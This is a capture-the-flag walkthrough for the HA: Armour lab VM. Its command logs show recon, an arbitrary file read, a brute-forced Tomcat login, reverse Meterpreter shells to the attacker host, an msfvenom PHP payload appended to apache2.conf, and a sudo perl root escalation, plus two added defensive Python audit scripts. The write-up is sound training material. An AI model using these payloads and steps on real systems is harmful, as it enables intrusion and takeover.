  • HA: Armour Write-up


    Download: click here

    bilibili: click here

    Information gathering

    • An nmap ping sweep finds the target at 192.168.116.140:
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00031s latency).
    Nmap scan report for 192.168.116.140
    Host is up (0.00074s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
    ➜  ~ nmap -A -T4 192.168.116.140 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.0018s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA: Armour
    8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
    | ajp-methods: 
    |_  Supported methods: GET HEAD POST OPTIONS
    8080/tcp  open  http    Apache Tomcat 9.0.24
    |_http-favicon: Apache Tomcat
    |_http-title: Apache Tomcat/9.0.24
    65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
    |   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
    |_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
    ➜  ~
    
    • Ports 80, 8009 and 8080 are open; all three are web-related services: Apache httpd, Apache JServ (AJP) and Apache Tomcat. Port 65534 is SSH.
    • Connecting to SSH on that port, the login banner gives the first flag, HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}, and a hint: TheOlympics
    ➜  ~ ssh 192.168.116.140 -p65534      
    The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
    ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
    
                                                                                                 
           db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba   
          d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b  
         d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P  
        d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'  
       d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'    
      d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b    
     d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b   
    d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                                                                                 
                                                                                                 
                                    www.hackingarticles.in
    
                     HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                            
                                  Hint 1: TheOlympics
    
    kali-team@192.168.116.140's password:
    
    • Opening port 80 in a browser and checking the source with F12, the HTML comments mention armour, notes.txt and 69. At first this meant nothing to me, but anyone familiar with the TCP/UDP port number list can guess that 69 is the TFTP (Trivial File Transfer Protocol) port (see the full list of TCP and UDP port numbers).
    • nmap with a UDP scan can check whether port 69 is open.
    ➜  ~ sudo  nmap -sU -p69 192.168.116.140
    [sudo] kali-team 的密码:
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.00073s latency).
    
    PORT   STATE         SERVICE
    69/udp open|filtered tftp
    MAC Address: 00:0C:29:E7:98:9F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
    
    • Because raw UDP probes have to be sent, nmap must run as root via sudo. The target does have port 69 open (nmap reports open|filtered because the UDP probe received no reply).
    • Connecting with a TFTP client and fetching notes.txt yields the second flag.
    ➜  ~ atftp                
    tftp> connect 192.168.116.140
    tftp> get notes.txt
    tftp> quit 
    ➜  ~ cat notes.txt
    Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
    
    Hint 2: maybeevena
    ➜  ~
    
    • There is another hint, maybeevena, which means nothing to me yet. Next, brute-force .php files on port 80.
    ➜  ~ dirb http://192.168.116.140 -X .php
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Oct  9 22:23:10 2019
    URL_BASE: http://192.168.116.140/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.140/ ----
    + http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    -----------------
    END_TIME: Wed Oct  9 22:23:13 2019
    DOWNLOADED: 4612 - FOUND: 1
    ➜  ~
    
    • file.php is found; the page is completely blank, so fuzz its parameter name.
    ➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        
    
    Total time: 0.130840
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 588.5036
    
    ➜  ~
    
    • The parameter is file, and it is an arbitrary file read vulnerability. Since the server is Apache, the first idea is to read Apache-related files; a sensitive one is .htpasswd, usually located at /etc/apache2/.htpasswd
    ➜  ~ curl http://192.168.116.140/file.php?file=/etc/apache2/.htpasswd                      
    Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
    
    
    Hint 3: StarBucks
    ➜  ~
    
    • That gives the third flag and the third hint: StarBucks.
    • The official hint:

    P.S. Klaw has a habit of dividing his passwords into 3 parts and saving them at different locations. So, if you get some, combine them to move forward.

    • Joining the three hints gives TheOlympics + maybeevena + StarBucks, i.e. TheOlympicsmaybeevenaStarBucks, which we simply try as the password.

    Getting a session via Tomcat

    • Port 8080 in a browser is the Tomcat manager page. The password is already known; now the username has to be brute-forced.
    ➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
    CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
    Starting at http://192.168.116.140
    Visiting: http://192.168.116.140, got response code 200
    Attribute text found:
    
    
    Offsite link, not following: https://hackingarticles.in
    Writing words to file
    ➜  CeWL git:(master) ✗ cat dict.txt           
    Armour
    PAGE
    CONTENT
    Header
    ARMOUR
    Collection
    Armours
    MCU
    Photo
    Grid
    armour
    End
    Page
    Content
    Footer
    Powered
    Hacking
    Articles
    notes
    txt
    ➜  CeWL git:(master) ✗ pwd               
    /home/kali-team/Kali-Team_Tools/CeWL
    ➜  CeWL git:(master) ✗
    
    • CeWL crawls the port-80 site to build a username wordlist, and Metasploit's tomcat_mgr_login module enumerates the Tomcat login with it.
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 
    
    Module options (auxiliary/scanner/http/tomcat_mgr_login):
    
       Name              Current Setting                                                 Required  Description
       ----              ---------------                                                 --------  -----------
       BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
       DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
       PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
       PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
       Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             8080                                                            yes       The target port (TCP)
       SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
       STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
       TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
       THREADS           1                                                               yes       The number of concurrent threads
       USERNAME                                                                          no        The HTTP username to specify for authentication
       USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false                                                           no        Try the username as the password for all users
       USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
       VERBOSE           true                                                            yes       Whether to print output for all attempts
       VHOST                                                                             no        HTTP server virtual host
    
    msf5 auxiliary(scanner/http/tomcat_mgr_login) >
    
    • For some reason it only succeeded after I rebooted the server; the username is armour.
    • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
    • There are many ways to upload a web shell to Tomcat, for example deploying a WAR file manually through the manager.
    • Using Metasploit here saves time.
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
    set httppassword  
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
    httppassword => TheOlympicsmaybeevenaStarBucks
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
    httpusername => armour
    msf5 exploit(multi/http/tomcat_mgr_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Retrieving session ID and CSRF token...
    [*] Uploading and deploying wJ0oIWvcGX...
    [*] Executing wJ0oIWvcGX...
    [*] Undeploying wJ0oIWvcGX ...
    [*] Sending stage (53867 bytes) to 192.168.116.140
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
    
    meterpreter >
    
    • Enumerate locally listening ports
    meterpreter > shell 
    Process 61 created.
    Channel 75 created.
    netstat -antp
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
    tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -                   
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
    tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -                   
    tcp6       0      0 :::8080                 :::*                    LISTEN      572/java            
    tcp6       0      0 :::80                   :::*                    LISTEN      -                   
    tcp6       0      0 :::65534                :::*                    LISTEN      -                   
    tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java            
    tcp6       0      0 :::8009                 :::*                    LISTEN      572/java            
    tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
    
    • Port 8081 is listening on the target but bound to 127.0.0.1, so it can only be reached locally. We can forward it out with Meterpreter's built-in portfwd.
    meterpreter > portfwd /?
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    
    OPTIONS:
    
        -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
        -R        Indicates a reverse port forward.
        -h        Help banner.
        -i <opt>  Index of the port forward entry to interact with (see the "list" command).
        -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
        -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
        -r <opt>  Forward: remote host to connect to.
    meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
    [*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
    meterpreter >
    
    • Now requesting our own port 8081 returns the fourth flag.
    ➜  ~ curl http://127.0.0.1:8081                                        
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    
    • Or fetch it directly on the target:
    tomcat@ubuntu:~$ cd /tmp
    cd /tmp
    tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
    wget http://127.0.0.1:8081
    --2019-10-10 04:46:42--  http://127.0.0.1:8081/
    Connecting to 127.0.0.1:8081... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 56 [text/html]
    Saving to: ‘index.html’
    
    index.html          100%[===================>]      56  --.-KB/s    in 0s      
    
    2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
    
    tomcat@ubuntu:/tmp$ cat index.html
    cat index.html
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    tomcat@ubuntu:/tmp$
    

    Privilege escalation

    • Look for SGID files
    tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
    find / -perm -g=s -type f 2>/dev/null
    /sbin/pam_extrausers_chkpwd
    /sbin/unix_chkpwd
    /usr/bin/crontab
    /usr/bin/expiry
    /usr/bin/chage
    /usr/bin/ssh-agent
    /usr/bin/wall
    /usr/bin/bsd-write
    /usr/bin/mlocate
    tomcat@ubuntu:/$
    
    • Look for SUID files
    tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/umount
    /bin/su
    /bin/ping
    /bin/fusermount
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    tomcat@ubuntu:/$ 
    tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
    find / -perm -4000 2>dev/null | xargs ls -la
    -rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
    -rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
    -rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
    -rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
    -rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
    -rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
    -rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
    -rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
    -rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
    -rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
    -rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
    -rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
    tomcat@ubuntu:/$
    
    • Look for writable directories; /var/www/html is among them.
    tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
    find / -writable -type d 2>/dev/null
    /dev/mqueue
    /dev/shm
    /tftpboot
    /var/lib/php/sessions
    /var/www/html
    /var/tmp
    /proc/902/task/902/fd
    /proc/902/fd
    /proc/902/map_files
    /tmp
    
    • Look for root-owned files that are writable by our user
    tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
    <ev/null | grep -v "/proc/" |xargs ls -al |grep root
    -rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
    -rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
    --w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
    tomcat@ubuntu:/$
    
    • /etc/apache2/apache2.conf and /opt/tomcat/conf/tomcat-users.xml are writable.
    • /opt/tomcat/conf/tomcat-users.xml only holds the credentials we already have, so /etc/apache2/apache2.conf is the file to look at.
    • Check the passwd file. Each line is split by colons (:) into 7 fields: username:password:UID:GID:comment (GECOS):home directory:login shell
    • The group file has the fields: group name:password:GID:list of members
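The condition exploited here, a root-owned configuration file that other accounts can modify, is something a defender can audit for routinely. The following is an added example, not code from the original post or the HA: Armour VM: it parses `ls -al` style lines such as the listing above and flags root-owned regular files that are world- or group-writable, ignoring pseudo-filesystems. The ports.conf and server.xml entries in the sample are constructed, not taken from the target.

```python
"""Flag root-owned files that a non-root account can modify.

Added example for this write-up, not code from the original post or
the HA: Armour VM. It parses `ls -al` style lines and reports root-owned
regular files whose mode grants write access to the group or to
everyone, skipping kernel pseudo-filesystems whose modes are not
meaningful for this check.
"""
import re
from dataclasses import dataclass

# Constructed sample: lines taken from the listing in the write-up, plus
# two constructed entries (ports.conf, server.xml) to show a file that is
# not flagged and one that is only group-writable.
SAMPLE_LISTING = """\
-rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-r--r-- 1 root   root      581 Sep 21 11:30 /etc/apache2/ports.conf
-rw-rw-r-- 1 root   tomcat   7500 Sep 21 21:15 /opt/tomcat/conf/server.xml
"""

PSEUDO_FS = ("/proc/", "/sys/", "/dev/")

# type + 9 permission chars, link count, owner, group, size, month, day,
# time-or-year, path
LS_LINE = re.compile(
    r"^(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>.+)$"
)


@dataclass
class Finding:
    path: str
    owner: str
    group: str
    mode: str
    reason: str


def parse_ls_line(line):
    """Return (mode, owner, group, path) for one `ls -l` line, or None."""
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    return m.group("mode"), m.group("owner"), m.group("group"), m.group("path")


def write_bits(mode):
    """Which permission classes may write, from a 10-char mode string."""
    # mode[0] is the file type; owner = 1-3, group = 4-6, other = 7-9
    return {"owner": mode[2] == "w", "group": mode[5] == "w", "other": mode[8] == "w"}


def risky_root_files(listing, trusted_groups=("root",)):
    """Root-owned regular files that non-root accounts can write to."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, group, path = parsed
        if owner != "root" or mode[0] != "-" or path.startswith(PSEUDO_FS):
            continue
        bits = write_bits(mode)
        if bits["other"]:
            reason = "world-writable"
        elif bits["group"] and group not in trusted_groups:
            reason = f"writable by group '{group}'"
        else:
            continue
        findings.append(Finding(path, owner, group, mode, reason))
    return findings


if __name__ == "__main__":
    for f in risky_root_files(SAMPLE_LISTING):
        print(f"{f.mode} {f.owner}:{f.group} {f.path}  <- {f.reason}")
```

On a live host, feed it the output of `find / -type f -user root -perm /022 -exec ls -la {} +` instead of the embedded sample.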
    tomcat@ubuntu:/$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
    armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    tomcat:x:1001:1001::/opt/tomcat:/bin/false
    aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
    tomcat@ubuntu:/$ 
    
    
    tomcat@ubuntu:~$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,armour
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:armour
    floppy:x:25:
    tape:x:26:
    sudo:x:27:armour
    audio:x:29:
    dip:x:30:armour
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:armour
    staff:x:50:
    games:x:60:
    users:x:100:
    nogroup:x:65534:
    systemd-journal:x:101:
    systemd-network:x:102:
    systemd-resolve:x:103:
    input:x:104:
    crontab:x:105:
    syslog:x:106:
    messagebus:x:107:
    mlocate:x:108:
    uuidd:x:109:
    ssh:x:110:
    armour:x:1000:
    lpadmin:x:111:armour
    sambashare:x:112:armour
    ssl-cert:x:113:
    tomcat:x:1001:
    aarti:x:1002:
    tomcat@ubuntu:~$
    
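To turn the passwd and group formats described above into something checkable, here is an added example (not code from the original post): it parses the 7-field passwd lines and 4-field group lines, lists the accounts that can actually log in, and resolves each one's primary and supplementary groups to see who sits in privileged groups such as sudo or adm. The sample data is a subset of the two listings above.

```python
"""Summarise login-capable accounts and their group memberships.

Added example for this write-up, not the original post's code. Parses
/etc/passwd (7 colon-separated fields) and /etc/group (4 fields) and
reports which accounts have an interactive shell and which of those
belong to a privileged group.
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
PRIVILEGED_GROUPS = {"sudo", "wheel", "adm", "root", "shadow", "docker"}

# Constructed sample: a subset of the entries from the listings above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
"""

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,armour
sudo:x:27:armour
www-data:x:33:
armour:x:1000:
tomcat:x:1001:
aarti:x:1002:
"""


def parse_passwd(text):
    """Map username -> dict of the passwd fields; malformed lines are skipped."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = parts
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue
        name, _pw, gid, members = parts
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def groups_of(user, users, groups):
    """All groups of a user: the primary group (matched by GID) plus
    every group that lists the user as a supplementary member."""
    primary_gid = users[user]["gid"]
    return {g for g, (gid, members) in groups.items()
            if gid == primary_gid or user in members}


def interactive_accounts(users):
    """Accounts whose login shell is not a known nologin shell."""
    return sorted(u for u, info in users.items()
                  if info["shell"] not in NOLOGIN_SHELLS)


def privileged_logins(users, groups):
    """Interactive non-root accounts that belong to a privileged group."""
    out = {}
    for user in interactive_accounts(users):
        if users[user]["uid"] == 0:
            continue
        priv = groups_of(user, users, groups) & PRIVILEGED_GROUPS
        if priv:
            out[user] = sorted(priv)
    return out


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    groups = parse_group(SAMPLE_GROUP)
    print("interactive:", interactive_accounts(users))
    print("privileged:", privileged_logins(users, groups))
```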
    • Two regular users are found: aarti and armour.
    • Download the Apache configuration file to the attacking machine. By default Apache runs as the www-data user.
    http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
    
    • Edit the User and Group directives so that Apache runs as one of the regular users found above. Why not run it as root? Without recompiling, Apache will not run as root, and the web service would not start at all; so the only option is to change it to aarti.
    • Overwrite the Apache configuration file
    tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
    <p://192.168.116.1:8000/apache2.conf -O apache2.conf
    --2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
    Connecting to 192.168.116.1:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7195 (7.0K) [text/plain]
    Saving to: ‘apache2.conf’
    
    apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      
    
    utime(apache2.conf): Operation not permitted
    2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
    
    tomcat@ubuntu:/etc/apache2$ cat apache2.conf
    
    • After that, write a web shell into the directory served on port 80 (this is the challenge author's intended route). When I tried it, it did not work: the file is created as the tomcat user, and aarti cannot read it, so it cannot be served and the server returns a 500 error.
    • Instead I got a session by including the Apache configuration file itself.
    • That is, append the shell to apache2.conf, then trigger it through the file inclusion vulnerability found earlier.
    ➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
    ➜  ~ cat shell.php >> apache2.conf 
    
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:2333 
    [*] Sending stage (38288 bytes) to 192.168.116.140
    [*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
    
    meterpreter > getuid 
    Server username: aarti (1002)
    meterpreter > shell 
    Process 12388 created.
    Channel 0 created.
    python3.6 -c 'import pty;pty.spawn("/bin/bash")'
    aarti@ubuntu:/var/www/html$ whoami
    whoami
    aarti
    aarti@ubuntu:/var/www/html$
    

    Escalating to root

    • List the passwordless sudo entries; perl is allowed.
    aarti@ubuntu:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for aarti on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User aarti may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/perl
    aarti@ubuntu:/var/www/html$ 
    aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
    sudo perl -e 'exec "/bin/bash";'
    root@ubuntu:/var/www/html# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:/var/www/html# 
    root@ubuntu:~# ls
    ls
    final.txt
    root@ubuntu:~# cat final.txt
    cat final.txt
    
             ______   ______    _____   _     _  ______  
       /   (_____  |  ___   / ___  | |   | |(_____  
      /     _____) )| | _ | || |   | || |   | | _____) )
     / /  (_____ ( | || || || |   | || |   | |(_____ ( 
    | |__| |      | || || || || |___| || |___| |      | |
    |______|      |_||_||_||_| \_____/  \______|      |_|
                                                         
    
        IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
    
    
    !! Congrats you have finished this task !!
    							
    Contact us here:
    								
    Hacking Articles : https://twitter.com/rajchandel/
    		
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    	
